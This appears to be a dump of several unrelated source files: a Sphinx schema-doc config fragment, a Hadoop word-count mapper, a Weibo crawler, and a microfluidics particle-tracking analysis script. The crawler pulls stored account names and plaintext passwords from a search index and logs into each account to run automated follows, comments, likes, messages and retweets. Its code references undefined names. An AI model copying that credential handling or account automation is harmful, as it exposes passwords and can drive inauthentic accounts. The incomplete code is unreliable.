'SequencingRun', 'RawSequenceData', 'DataProcessing'] # tables = data_elements.keys() miairr_schema = [] with open(os.path.join(download_path, '%s.tsv' % 'AIRR_Minimal_Standard_Data_Elements'), 'w') as f: writer = csv.DictWriter(f, fieldnames=fields, dialect='excel-tab', extrasaction='ignore') writer.writeheader() for spec in tables: for r in data_elements[spec]: if r['Level'] and not r['Deprecated']: miairr_schema.append(r) writer.writerow(r) html_context['MiAIRR_schema'] = miairr_schema # Write individual spec TSVs fields = ['Name', 'Type', 'Attributes', 'Definition'] tables = ['Repertoire', 'Study', 'Subject', 'Diagnosis', 'Sample', 'CellProcessing', 'NucleicAcidProcessing', 'PCRTarget', 'SequencingRun', 'RawSequenceData', 'DataProcessing', 'Rearrangement', 'Alignment', 'Clone', 'Tree', 'Node', 'Cell', 'RearrangedSequence', 'UnrearrangedSequence', 'SequenceDelineationV', 'AlleleDescription', 'GermlineSet', 'GenotypeSet', 'Genotype', 'MHCGenotypeSet', 'MHCGenotype'] for spec in tables: with open(os.path.join(download_path, '%s.tsv' % spec), 'w') as f: writer = csv.DictWriter(f, fieldnames=fields, dialect='excel-tab', extrasaction='ignore') writer.writeheader() writer.writerows(data_elements[spec]) # -- Site configuration from schema data ---------------------------------- # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. 
version = str(airr_schema['Info']['version']) # The full version, including alpha/beta/rc tags. release = str(airr_schema['Info']['version'])
1.625
2
A10/mapper.py
lrodrin/masterAI
2
12789947
#!/usr/bin/env python
# coding=utf-8

"""mapper.py"""

import sys

# input data arrives via STDIN (standard input)
for line in sys.stdin:
    # strip whitespace from the beginning and end of the line
    line = line.strip()
    # split the line into words
    words = line.split()
    for word in words:
        # write the map results to STDOUT (standard output);
        # whatever comes out of here will be the input of reducer.py
        # key-value pairs are separated by a tab
        # emit a count of 1 for each word, so the counts per word can be accumulated later
        print('%s\t%s' % (word, 1))
3.640625
4
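The comments in mapper.py refer to a companion reducer.py that accumulates the per-word counts. That file is not part of this record, but a minimal Hadoop-Streaming-style reducer might look like this sketch (not the repository's actual file):

#!/usr/bin/env python
import sys

current_word, current_count = None, 0
# Hadoop Streaming sorts mapper output by key, so equal words arrive adjacently
for line in sys.stdin:
    word, count = line.strip().split('\t', 1)
    if word == current_word:
        current_count += int(count)
    else:
        if current_word is not None:
            print('%s\t%d' % (current_word, current_count))
        current_word, current_count = word, int(count)
if current_word is not None:
    print('%s\t%d' % (current_word, current_count))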
xnr/WeiboCrawler.py
BingquLee/spiders
0
12789948
import time

from selenium import webdriver

from SinaLauncher import SinaLauncher


class WeiboCrawler(object):
    def __init__(self):
        self.driver = webdriver.Firefox()

    def get_present_time(self):
        present_time_stamp = time.localtime(int(time.time()))
        present_time = time.strftime("%Y-%m-%d %H:%M:%S", present_time_stamp)
        year = int(present_time.split(" ")[0].split("-")[0])
        month = int(present_time.split(" ")[0].split("-")[1])
        day = int(present_time.split(" ")[0].split("-")[2])
        hour = int(present_time.split(" ")[1].split(":")[0])
        minute = int(present_time.split(" ")[1].split(":")[1])
        second = int(present_time.split(" ")[1].split(":")[2])
        return year, month, day, hour, minute, second

    def all_weibo_xnr_crawler(self):
        query_body = {
            'query': {'term': {'create_status': 2}},
            'size': 10000
        }
        search_results = es.search(index=weibo_xnr_index_name, doc_type=weibo_xnr_index_type,
                                   body=query_body)['hits']['hits']
        if search_results:
            for result in search_results:
                result = result['_source']
                mail_account = result['weibo_mail_account']
                phone_account = result['weibo_phone_account']
                pwd = result['password']
                if mail_account:
                    account_name = mail_account
                elif phone_account:
                    account_name = phone_account
                else:
                    account_name = False
                if account_name:
                    self.execute(account_name, pwd)

    def execute(self, uname, upasswd):
        xnr = SinaLauncher(uname, upasswd)
        print(xnr.login())
        print('uname::', uname)
        uid = xnr.uid
        current_ts = int(time.time())
        timestamp_retweet, timestamp_like, timestamp_at, timestamp_private, \
            timestamp_comment_receive, timestamp_comment_make = self.newest_time_func(xnr.uid)
        print(timestamp_retweet, timestamp_like, timestamp_at,
              timestamp_private, timestamp_comment_receive, timestamp_comment_make)

        # try:
        print('start run weibo_feedback_follow.py ...')
        fans, follow, groups = self.FeedbackFollow(xnr.uid, current_ts).execute()
        print('run weibo_feedback_follow.py done!')
        # except:
        #     print('Except Abort')

        # try:
        print('start run weibo_feedback_at.py ...')
        self.FeedbackAt(xnr.uid, current_ts, fans, follow, groups, timestamp_at).execute()
        print('run weibo_feedback_at.py done!')

        print('start run weibo_feedback_comment.py ...')
        self.FeedbackComment(xnr.uid, current_ts, fans, follow, groups,
                             timestamp_comment_make, timestamp_comment_receive).execute()
        print('run weibo_feedback_comment.py done!')

        print('start run weibo_feedback_like.py ...')
        self.FeedbackLike(xnr.uid, current_ts, fans, follow, groups, timestamp_like).execute()
        print('run weibo_feedback_like.py done!')

        print('start run weibo_feedback_private.py ...')
        # print('timestamp_private:::', timestamp_private)
        # print('current_ts::::::', current_ts)
        self.FeedbackPrivate(xnr.uid, current_ts, fans, follow, groups, timestamp_private).execute()
        print('run weibo_feedback_private.py done!')

        print('start run weibo_feedback_retweet.py ...')
        self.FeedbackRetweet(xnr.uid, current_ts, fans, follow, groups, timestamp_retweet).execute()
        print('run weibo_feedback_retweet.py done!')
2.96875
3
experiments/bin_plot_11.02.21-BPE_Pressure_Deflection_20X.py
sean-mackenzie/gdpyt-analysis
0
12789949
# test bin, analyze, and plot functions # imports import os from os.path import join from os import listdir import matplotlib.pyplot as plt # imports import numpy as np import pandas as pd from scipy.optimize import curve_fit import filter import analyze from correction import correct from utils import fit, functions, bin, io, plotting, modify, plot_collections from utils.plotting import lighten_color # A note on SciencePlots colors """ Blue: #0C5DA5 Green: #00B945 Red: #FF9500 Orange: #FF2C00 Other Colors: Light Blue: #7BC8F6 Paler Blue: #0343DF Azure: #069AF3 Dark Green: #054907 """ sciblue = '#0C5DA5' scigreen = '#00B945' scired = '#FF9500' sciorange = '#FF2C00' plt.style.use(['science', 'ieee', 'std-colors']) fig, ax = plt.subplots() size_x_inches, size_y_inches = fig.get_size_inches() plt.close(fig) # ---------------------------------------------------------------------------------------------------------------------- # 1. SETUP - BASE DIRECTORY base_dir = '/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/' # ---------------------------------------------------------------------------------------------------------------------- # 2. SETUP - IDPT path_idpt = join(base_dir, 'results-04.26.22_idpt') path_test_coords = join(path_idpt, 'coords/test-coords') path_calib_coords = join(path_idpt, 'coords/calib-coords') path_similarity = join(path_idpt, 'similarity') path_results = join(path_idpt, 'results') path_figs = join(path_idpt, 'figs') # ---------------------------------------------------------------------------------------------------------------------- # ---------------------------------------------------------------------------------------------------------------------- # 3. ANALYSIS - READ FILES method = 'idpt' microns_per_pixel = 0.8 # ----- 4.1 CORRECT TEST COORDS correct_test_coords = False if correct_test_coords: use_idpt_zf = False use_spct_zf = False # ------------------------------------------------------------------------------------------------------------------ if use_idpt_zf: """ NOTE: This correction scheme fits a 2D spline to the in-focus particle positions and uses this to set their z_f = 0 position. """ param_zf = 'zf_from_peak_int' plot_calib_plane = False plot_calib_spline = False kx, ky = 2, 2 # step 1. read calibration coords dfc, dfcpid, dfcpop, dfcstats = io.read_calib_coords(path_calib_coords, method) # step 2. remove outliers # 2.1 get z_in-focus mean + standard deviation zf_c_mean = dfcpid[param_zf].mean() zf_c_std = dfcpid[param_zf].std() # 2.2 filter calibration coords dfcpid = dfcpid[(dfcpid[param_zf] > zf_c_mean - zf_c_std) & (dfcpid[param_zf] < zf_c_mean + zf_c_std)] # step 3. fit plane dictc_fit_plane = correct.fit_in_focus_plane(df=dfcpid, param_zf=param_zf, microns_per_pixel=microns_per_pixel) popt_c = dictc_fit_plane['popt_pixels'] if plot_calib_plane: fig = plotting.plot_fitted_plane_and_points(df=dfcpid, dict_fit_plane=dictc_fit_plane) plt.savefig(path_figs + '/idpt-calib-coords_fit-plane_raw.png') plt.close() dfict_fit_plane = pd.DataFrame.from_dict(dictc_fit_plane, orient='index', columns=['value']) dfict_fit_plane.to_excel(path_figs + '/idpt-calib-coords_fit-plane_raw.xlsx') # step 4. 
FIT SMOOTH 2D SPLINE AND PLOT RAW POINTS + FITTED SURFACE (NO CORRECTION) bispl_c, rmse_c = fit.fit_3d_spline(x=dfcpid.x, y=dfcpid.y, z=dfcpid[param_zf], kx=kx, ky=ky) if plot_calib_spline: fig, ax = plotting.scatter_3d_and_spline(dfcpid.x, dfcpid.y, dfcpid[param_zf], bispl_c, cmap='RdBu', grid_resolution=30, view='multi') ax.set_xlabel('x (pixels)') ax.set_ylabel('y (pixels)') ax.set_zlabel(r'$z_{f} \: (\mu m)$') plt.suptitle('fit RMSE = {}'.format(np.round(rmse_c, 3))) plt.savefig(path_figs + '/idpt-calib-coords_fit-spline_kx{}_ky{}.png'.format(kx, ky)) plt.close() # step 5. read test_coords dft = io.read_test_coords(path_test_coords) # step 6. drop unnecessary columns in dft dft = dft[['frame', 'id', 'z', 'z_true', 'x', 'y', 'cm', 'error']] # step 7. create a z_corr column by using fitted spline to correct z dft = correct.correct_z_by_spline(dft, bispl=bispl_c, param_z='z') dft['z_true_corr'] = dft['z_true'] - dft['z_cal_surf'] # step 8. export corrected test_coords dft.to_excel(path_results + '/test_coords_corrected_t-calib2_c-calib1.xlsx', index=False) elif use_spct_zf: """ NOTE: No correction is currently performed. The z-coords are well aligned enough in both calibration image sets to just ignore. This is not necessarily surprising because the calibration images were acquired with the intention of making the z-coords identical for all calibration image sets (by using the same beginning and ending tick mark on the fine adjustment knob during image acquisition). """ # -------------------------------------------------------------------------------------------------------------- # SETUP - SPCT CALIBRATION IN-FOCUS COORDS # SPCT analysis of images used for IDPT calibration path_spct_calib_coords = join(base_dir, 'results-04.26.22_spct_calib1_test-2-3/coords/calib-coords') path_calib_pid_defocus = join(path_spct_calib_coords, 'calib_spct_pid_defocus_stats_c-calib1_t-calib2.xlsx') path_calib_spct_stats = join(path_spct_calib_coords, 'calib_spct_stats_c-calib1_t-calib2.xlsx') path_calib_spct_pop = join(path_spct_calib_coords, 'calib_spct_pop_defocus_stats_c-calib1_t-calib2.xlsx') # SPCT analysis of images used for IDPT test path_spct_test_coords = join(base_dir, 'results-04.28.22_spct-calib2_test3/coords/calib-coords') path_test_pid_defocus = join(path_spct_test_coords, 'calib_spct_pid_defocus_stats_c-calib2_t-calib3.xlsx') path_test_spct_stats = join(path_spct_test_coords, 'calib_spct_stats_c-calib2_t-calib3.xlsx') path_test_spct_pop = join(path_spct_test_coords, 'calib_spct_pop_defocus_stats_c-calib2_t-calib3.xlsx') # -------------------------------------------------------------------------------------------------------------- # --- PART A. READ COORDS USED FOR IDPT CALIBRATION (i.e. 'calib1') merge_spct_stats = True param_zf = 'zf_from_peak_int' plot_calib_plane = True plot_test_plane = True kx, ky = 2, 2 # step 1. merge [['x', 'y']] into spct pid defocus stats. if merge_spct_stats: # read SPCT calibration coords and merge ['x', 'y'] into pid_defocus_stats dfcpid = pd.read_excel(path_calib_pid_defocus) dfcstats = pd.read_excel(path_calib_spct_stats) dfcpid = modify.merge_calib_pid_defocus_and_correction_coords(path_calib_coords, method, dfs=[dfcstats, dfcpid]) else: # read SPCT pid defocus stats that have already been merged path_calib_pid_defocus = join(path_calib_coords, 'calib_spct_pid_defocus_stats_calib1_xy.xlsx') dfcpid = pd.read_excel(path_calib_pid_defocus) # step 2. 
remove outliers # 2.1 get z_in-focus mean + standard deviation zf_c_mean = dfcpid[param_zf].mean() zf_c_std = dfcpid[param_zf].std() # 2.2 filter calibration coords dfcpid = dfcpid[(dfcpid[param_zf] > 34) & (dfcpid[param_zf] < zf_c_mean + zf_c_std / 2)] dfcpid = dfcpid[dfcpid['x'] > 120] # step 3. fit plane dictc_fit_plane = correct.fit_in_focus_plane(df=dfcpid, param_zf=param_zf, microns_per_pixel=microns_per_pixel) popt_c = dictc_fit_plane['popt_pixels'] if plot_calib_plane: fig = plotting.plot_fitted_plane_and_points(df=dfcpid, dict_fit_plane=dictc_fit_plane) plt.savefig(path_figs + '/calibration-coords_fit-plane_raw.png') plt.close() dfict_fit_plane = pd.DataFrame.from_dict(dictc_fit_plane, orient='index', columns=['value']) dfict_fit_plane.to_excel(path_figs + '/calibration-coords_fit-plane_raw.xlsx') # FIT SMOOTH 2D SPLINE AND PLOT RAW POINTS + FITTED SURFACE (NO CORRECTION) bispl_c, rmse_c = fit.fit_3d_spline(x=dfcpid.x, y=dfcpid.y, z=dfcpid[param_zf], kx=kx, ky=ky) fig, ax = plotting.scatter_3d_and_spline(dfcpid.x, dfcpid.y, dfcpid[param_zf], bispl_c, cmap='RdBu', grid_resolution=30, view='multi') ax.set_xlabel('x (pixels)') ax.set_ylabel('y (pixels)') ax.set_zlabel(r'$z_{f} \: (\mu m)$') plt.suptitle('fit RMSE = {}'.format(np.round(rmse_c, 3))) plt.savefig(path_figs + '/calibration-coords_fit-spline_kx{}_ky{}.png'.format(kx, ky)) plt.close() # --- # --- PART B. READ COORDS USED FOR IDPT TEST (i.e. 'calib2') # step 1. merge [['x', 'y']] into spct pid defocus stats. if merge_spct_stats: # read SPCT calibration coords and merge ['x', 'y'] into pid_defocus_stats dfcpid = pd.read_excel(path_test_pid_defocus) dfcstats = pd.read_excel(path_test_spct_stats) dfcpid = modify.merge_calib_pid_defocus_and_correction_coords(path_calib_coords, method, dfs=[dfcstats, dfcpid]) else: # read SPCT pid defocus stats that have already been merged path_calib_pid_defocus = join(path_calib_coords, 'calib_spct_pid_defocus_stats_calib2_xy.xlsx') dfcpid = pd.read_excel(path_calib_pid_defocus) # step 2. remove outliers # 2.1 get z_in-focus mean + standard deviation zf_c_mean = dfcpid[param_zf].mean() zf_c_std = dfcpid[param_zf].std() # 2.2 filter calibration coords dfcpid = dfcpid[(dfcpid[param_zf] > zf_c_mean - zf_c_std / 2) & (dfcpid[param_zf] < zf_c_mean + zf_c_std / 2)] # step 3. fit plane dictc_fit_plane = correct.fit_in_focus_plane(df=dfcpid, param_zf=param_zf, microns_per_pixel=microns_per_pixel) popt_c = dictc_fit_plane['popt_pixels'] if plot_test_plane: fig = plotting.plot_fitted_plane_and_points(df=dfcpid, dict_fit_plane=dictc_fit_plane) plt.savefig(path_figs + '/test-coords_fit-plane_raw.png') plt.close() dfict_fit_plane = pd.DataFrame.from_dict(dictc_fit_plane, orient='index', columns=['value']) dfict_fit_plane.to_excel(path_figs + '/test-coords_fit-plane_raw.xlsx') # FIT SMOOTH 2D SPLINE AND PLOT RAW POINTS + FITTED SURFACE (NO CORRECTION) bispl_c, rmse_c = fit.fit_3d_spline(x=dfcpid.x, y=dfcpid.y, z=dfcpid[param_zf], kx=kx, ky=ky) fig, ax = plotting.scatter_3d_and_spline(dfcpid.x, dfcpid.y, dfcpid[param_zf], bispl_c, cmap='RdBu', grid_resolution=30, view='multi') ax.set_xlabel('x (pixels)') ax.set_ylabel('y (pixels)') ax.set_zlabel(r'$z_{f} \: (\mu m)$') plt.suptitle('fit RMSE = {}'.format(np.round(rmse_c, 3))) plt.savefig(path_figs + '/test-coords_fit-spline_kx{}_ky{}.png'.format(kx, ky)) plt.close() # ---------------------------------------------------------------------------------------------------------------------- # 4. 
PLOT TEST COORDS RMSE-Z analyze_test_coords = False save_plots = False show_plots = False if analyze_test_coords: # read test coords dft = io.read_test_coords(path_test_coords) # test coords stats mag_eff = 20.0 area_pixels = 512 ** 2 area_microns = (512 * microns_per_pixel) ** 2 i_num_rows = len(dft) i_num_pids = len(dft.id.unique()) # --- # --- STEP 0. drop and rename columns for simplicity dft = dft.drop(columns=['z', 'z_true']) dft = dft.rename(columns={'z_corr': 'z', 'z_true_corr': 'z_true'}) # --- rmse_all_particles = False rmse_on_off_bpe = False rmse_compare = False # format plots xylim = 37.25 xyticks = [-30, -15, 0, 15, 30] lbls = ['On', 'Border', 'Off'] markers = ['s', 'd', 'o'] if rmse_all_particles: # --- STEP 1. CALCULATE RMSE-Z FOR ALL PARTICLES column_to_bin = 'z_true' bins_z = 20 round_z_to_decimal = 3 min_cm = 0.5 # 1.1 mean rmse-z dfrmse_mean = bin.bin_local_rmse_z(dft, column_to_bin=column_to_bin, bins=1, min_cm=min_cm, z_range=None, round_to_decimal=round_z_to_decimal, df_ground_truth=None, dropna=True, error_column='error', ) dfrmse_mean.to_excel(path_results + '/mean-rmse-z_bin=1_no-filters.xlsx') # 1.2 binned rmse-z dfrmse = bin.bin_local_rmse_z(dft, column_to_bin=column_to_bin, bins=bins_z, min_cm=min_cm, z_range=None, round_to_decimal=round_z_to_decimal, df_ground_truth=None, dropna=True, error_column='error', ) dfrmse.to_excel(path_results + '/binned-rmse-z_bins={}_no-filters.xlsx'.format(bins_z)) # 1.3 groupby 'bin' rmse-z mean + std dfrmsem, dfrmsestd = bin.bin_generic(dft, column_to_bin='bin', column_to_count='id', bins=bins_z, round_to_decimal=round_z_to_decimal, return_groupby=True) # 1.3 plot binned rmse-z if save_plots or show_plots: # close all figs plt.close('all') # ----------------------- BASIC RMSE-Z PLOTS # rmse-z: microns fig, ax = plt.subplots() ax.plot(dfrmse.index, dfrmse.rmse_z, '-o') ax.set_xlabel(r'$z_{true} \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(ticks=xyticks, labels=xyticks) ax.set_ylabel(r'$\sigma_{z} \: (\mu m)$') plt.tight_layout() if save_plots: plt.savefig(path_figs + '/rmse-z_microns.png') if show_plots: plt.show() plt.close() # ----------------------- Z-MEAN +/- Z-STD PLOTS # fit line popt, pcov = curve_fit(functions.line, dfrmse.z_true, dfrmse.z) z_fit = np.linspace(dfrmse.z_true.min(), dfrmse.z_true.max()) rmse_fit_line = np.sqrt(np.sum((functions.line(dfrmse.z_true, *popt) - dfrmse.z)**2) / len(dfrmse.z)) print(rmse_fit_line) # binned calibration curve with std-z errorbars (microns) + fit line fig, ax = plt.subplots() ax.errorbar(dfrmsem.z_true, dfrmsem.z, yerr=dfrmsestd.z, fmt='o', ms=3, elinewidth=0.5, capsize=1, color=sciblue, label=r'$\overline{z} \pm \sigma$') # ax.plot(z_fit, functions.line(z_fit, *popt), linestyle='--', linewidth=1.5, color='black', alpha=0.25, label=r'$dz/dz_{true} = $' + ' {}'.format(np.round(popt[0], 3))) ax.set_xlabel(r'$z_{true} \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(ticks=xyticks, labels=xyticks) ax.set_ylabel(r'$z \: (\mu m)$') ax.set_ylim([-xylim, xylim]) ax.set_yticks(ticks=xyticks, labels=xyticks) ax.legend(loc='lower right', handletextpad=0.25, borderaxespad=0.3) plt.tight_layout() if save_plots: plt.savefig(path_figs + '/calibration_curve_z+std-errobars_fit_line_a{}_b{}_slope-label-blk.png'.format( np.round(popt[0], 3), np.round(popt[1], 3)) ) if show_plots: plt.show() plt.close() if rmse_on_off_bpe: # --- STEP 0. SPLIT DATAFRAME INTO (1) OFF BPE and (2) OFF BPE. 
column_to_bin = 'x' bins_x = [145, 175, 205] round_x_to_decimal = 0 dfbx = bin.bin_by_list(dft, column_to_bin=column_to_bin, bins=bins_x, round_to_decimal=round_x_to_decimal, ) df_on = dfbx[dfbx['bin'] == bins_x[0]] df_edge = dfbx[dfbx['bin'] == bins_x[1]] df_off = dfbx[dfbx['bin'] == bins_x[2]] # --- plotting # --- STEP 1. PLOT CALIBRATION CURVE (Z VS. Z_TRUE) FOR EACH DATAFRAME (ON, EDGE, OFF) ss = 1 fig, ax = plt.subplots() ax.scatter(df_off.z_true, df_off.z, s=ss, marker=markers[2], color=sciblue, label=lbls[2]) ax.scatter(df_on.z_true, df_on.z, s=ss, marker=markers[0], color=sciorange, label=lbls[0]) ax.scatter(df_edge.z_true, df_edge.z, s=ss, marker=markers[1], color=scired, label=lbls[1]) ax.set_xlabel(r'$z_{true} \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(ticks=xyticks, labels=xyticks) ax.set_ylabel(r'$z \: (\mu m)$') ax.set_ylim([-xylim, xylim]) ax.set_yticks(ticks=xyticks, labels=xyticks) ax.legend(loc='lower right', markerscale=2.5) plt.tight_layout() if save_plots: plt.savefig(path_figs + '/on-edge-off-bpe_calibration_curve.png') if show_plots: plt.show() plt.close() # --- STEP 2. FOR EACH DATAFRAME (ON, EDGE, OFF), COMPUTE RMSE-Z AND PLOT for lbl, dft in zip(lbls, [df_on, df_edge, df_off]): # --- STEP 1. CALCULATE RMSE-Z FOR ALL PARTICLES column_to_bin = 'z_true' bins_z = 20 round_z_to_decimal = 3 min_cm = 0.5 # 1.1 mean rmse-z dfrmse_mean = bin.bin_local_rmse_z(dft, column_to_bin=column_to_bin, bins=1, min_cm=min_cm, z_range=None, round_to_decimal=round_z_to_decimal, df_ground_truth=None, dropna=True, error_column='error', ) dfrmse_mean.to_excel(path_results + '/{}_mean-rmse-z_bin=1_no-filters.xlsx'.format(lbl)) # 1.2 binned rmse-z dfrmse = bin.bin_local_rmse_z(dft, column_to_bin=column_to_bin, bins=bins_z, min_cm=min_cm, z_range=None, round_to_decimal=round_z_to_decimal, df_ground_truth=None, dropna=True, error_column='error', ) dfrmse.to_excel(path_results + '/{}_binned-rmse-z_bins={}_no-filters.xlsx'.format(lbl, bins_z)) # 1.3 groupby 'bin' rmse-z mean + std dfrmsem, dfrmsestd = bin.bin_generic(dft, column_to_bin='bin', column_to_count='id', bins=bins_z, round_to_decimal=round_z_to_decimal, return_groupby=True) # 1.3 plot binned rmse-z if save_plots or show_plots: # close all figs plt.close('all') # ----------------------- BASIC RMSE-Z PLOTS # rmse-z: microns fig, ax = plt.subplots() ax.plot(dfrmse.index, dfrmse.rmse_z, '-o') ax.set_xlabel(r'$z_{true} \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(ticks=xyticks, labels=xyticks) ax.set_ylabel(r'$\sigma_{z} \: (\mu m)$') plt.tight_layout() if save_plots: plt.savefig(path_figs + '/{}_rmse-z_microns.png'.format(lbl)) if show_plots: plt.show() plt.close() # ----------------------- Z-MEAN +/- Z-STD PLOTS # fit line popt, pcov = curve_fit(functions.line, dfrmse.z_true, dfrmse.z) z_fit = np.linspace(dfrmse.z_true.min(), dfrmse.z_true.max()) rmse_fit_line = np.sqrt(np.sum((functions.line(dfrmse.z_true, *popt) - dfrmse.z) ** 2) / len(dfrmse.z)) print(rmse_fit_line) # binned calibration curve with std-z errorbars (microns) + fit line fig, ax = plt.subplots() ax.errorbar(dfrmsem.z_true, dfrmsem.z, yerr=dfrmsestd.z, fmt='o', ms=3, elinewidth=0.5, capsize=1, color=sciblue, label=r'$\overline{z} \pm \sigma$') # ax.plot(z_fit, functions.line(z_fit, *popt), linestyle='--', linewidth=1.5, color='black', alpha=0.25, label=r'$dz/dz_{true} = $' + ' {}'.format(np.round(popt[0], 3))) ax.set_xlabel(r'$z_{true} \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(ticks=xyticks, labels=xyticks) ax.set_ylabel(r'$z \: (\mu 
m)$') ax.set_ylim([-xylim, xylim]) ax.set_yticks(ticks=xyticks, labels=xyticks) ax.legend(loc='lower right', handletextpad=0.25, borderaxespad=0.3) plt.tight_layout() if save_plots: plt.savefig(path_figs + '/{}_calibration_curve_z+std-errobars_fit_line_a{}_b{}_slope-label-blk.png'.format( lbl, np.round(popt[0], 3), np.round(popt[1], 3)) ) if show_plots: plt.show() plt.close() if rmse_compare: # 1. read binned rmse-z dataframes from Excel path_rmse_compare = join(path_results, 'on-edge-off-bpe') df1 = pd.read_excel(join(path_rmse_compare, '{}_binned-rmse-z_bins=20_no-filters.xlsx'.format(lbls[0]))) df2 = pd.read_excel(join(path_rmse_compare, '{}_binned-rmse-z_bins=20_no-filters.xlsx'.format(lbls[1]))) df3 = pd.read_excel(join(path_rmse_compare, '{}_binned-rmse-z_bins=20_no-filters.xlsx'.format(lbls[2]))) # 1.3 plot binned rmse-z if save_plots or show_plots: ms = 4 # ----------------------- BASIC RMSE-Z PLOTS # rmse-z: microns fig, ax = plt.subplots() ax.plot(df3.bin, df3.rmse_z, '-o', ms=ms, label=lbls[2], color=sciblue) ax.plot(df2.bin, df2.rmse_z, '-o', ms=ms, label=lbls[1], color=scired) ax.plot(df1.bin, df1.rmse_z, '-o', ms=ms, label=lbls[0], color=sciorange) ax.set_xlabel(r'$z_{true} \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(ticks=xyticks, labels=xyticks) ax.set_ylabel(r'$\sigma_{z} \: (\mu m)$') ax.legend() plt.tight_layout() if save_plots: plt.savefig(path_figs + '/compare-on-edge-off-bpe_rmse-z_microns.png') if show_plots: plt.show() plt.close() # rmse-z (microns) + c_m darken_clr = 1.0 alpha_clr = 1.0 fig, [axr, ax] = plt.subplots(nrows=2, sharex=True, gridspec_kw={'height_ratios': [1, 2]}) axr.plot(df3.bin, df3.cm, '-', ms=ms-2, marker=markers[2], color=sciblue) axr.plot(df2.bin, df2.cm, '-', ms=ms-2, marker=markers[1], color=scired) axr.plot(df1.bin, df1.cm, '-', ms=ms-2, marker=markers[0], color=sciorange) axr.set_ylabel(r'$c_{m}$') ax.plot(df3.bin, df3.rmse_z, '-', ms=ms-0.75, marker=markers[2], color=sciblue, label=lbls[2]) ax.plot(df2.bin, df2.rmse_z, '-', ms=ms-0.75, marker=markers[1], color=scired, label=lbls[1]) ax.plot(df1.bin, df1.rmse_z, '-', ms=ms-0.75, marker=markers[0], color=sciorange, label=lbls[0]) ax.set_xlabel(r'$z_{true} \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(ticks=xyticks, labels=xyticks) ax.set_ylabel(r'$\sigma_{z} \: (\mu m)$') ax.legend() plt.tight_layout() if save_plots: plt.savefig(path_figs + '/compare-on-edge-off-bpe_rmse-z_microns_cm.png') if show_plots: plt.show() plt.close() # ---------------------------------------------------------------------------------------------------------------------- # 5. IDPT VS. SPCT - COMPARE NUMBER OF PARTICLES PER Z compare_idpt_spct = False save_plots = False show_plots = False if compare_idpt_spct: # --- 1. IDPT # read IDPT test coords dft = io.read_test_coords(path_test_coords) # test coords stats mag_eff = 20.0 area_pixels = 512 ** 2 area_microns = (512 * microns_per_pixel) ** 2 i_num_rows = len(dft) i_num_pids = len(dft.id.unique()) dft = dft.drop(columns=['z', 'z_true']) dft = dft.rename(columns={'z_corr': 'z', 'z_true_corr': 'z_true'}) # --- 2. 
SPCT # 2.1 read SPCT off-bpe test coords dfs_off = pd.read_excel('/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/results-04.26.22_spct_calib1_test-2-3/coords/test-coords/test_coords_t-calib2_c-calib1.xlsx') dfs_on = pd.read_excel('/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/results-04.26.22_spct_stack-id-on-bpe/testcalib2_calcalib1/test_coords_t_20X_ccalib1_tcalib2_c_20X_tcalib2_ccalib1_2022-04-26 20:45:34.334931.xlsx') # 2.2 correct z by mean z_f from peak_intensity z_f_mean = 35.1 dfs_off['z'] = dfs_off['z'] - z_f_mean dfs_off['z_true'] = dfs_off['z_true'] - z_f_mean dfs_on['z'] = dfs_on['z'] - z_f_mean dfs_on['z_true'] = dfs_on['z_true'] - z_f_mean # --- 3. GROUPBY Z_TRUE dftg = dft.copy() dftg = dftg.round({'z_true': 0}) dftc = dftg.groupby('z_true').count().reset_index() dfs_offc = dfs_off.groupby('z_true').count().reset_index() dfs_onc = dfs_on.groupby('z_true').count().reset_index() # filter z_true for pretty plotting zlim = 35 dftc = dftc[(dftc['z_true'] > -zlim) & (dftc['z_true'] < zlim)] dfs_offc = dfs_offc[(dfs_offc['z_true'] > -zlim) & (dfs_offc['z_true'] < zlim)] dfs_onc = dfs_onc[(dfs_onc['z_true'] > -zlim) & (dfs_onc['z_true'] < zlim)] # --- # --- plotting # format plots xylim = 37.25 xyticks = [-30, -15, 0, 15, 30] ms = 3 # FIGURE 1. PLOT NUMBER OF PARTICLES PER Z_TRUE fig, ax = plt.subplots() ax.plot(dftc.z_true, dftc.z, '-o', ms=ms, color=sciblue, label=r'$IDPT$') ax.plot(dfs_offc.z_true, dfs_offc.z, '-o', ms=ms, color=lighten_color(scigreen, 1.0), label=r'$SPCT_{Low}$') ax.plot(dfs_onc.z_true, dfs_onc.z, '-o', ms=ms, color=lighten_color(scigreen, 1.2), label=r'$SPCT_{High}$') ax.set_xlabel(r'$z \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(xyticks) ax.set_ylabel(r'$N_{p} \: (\#)$') ax.set_ylim([0, 200]) ax.legend() plt.tight_layout() if save_plots: plt.savefig(path_figs + '/compare-idpt-spct_num-particles.png') if show_plots: plt.show() plt.close() # --- # FIGURE 2. 
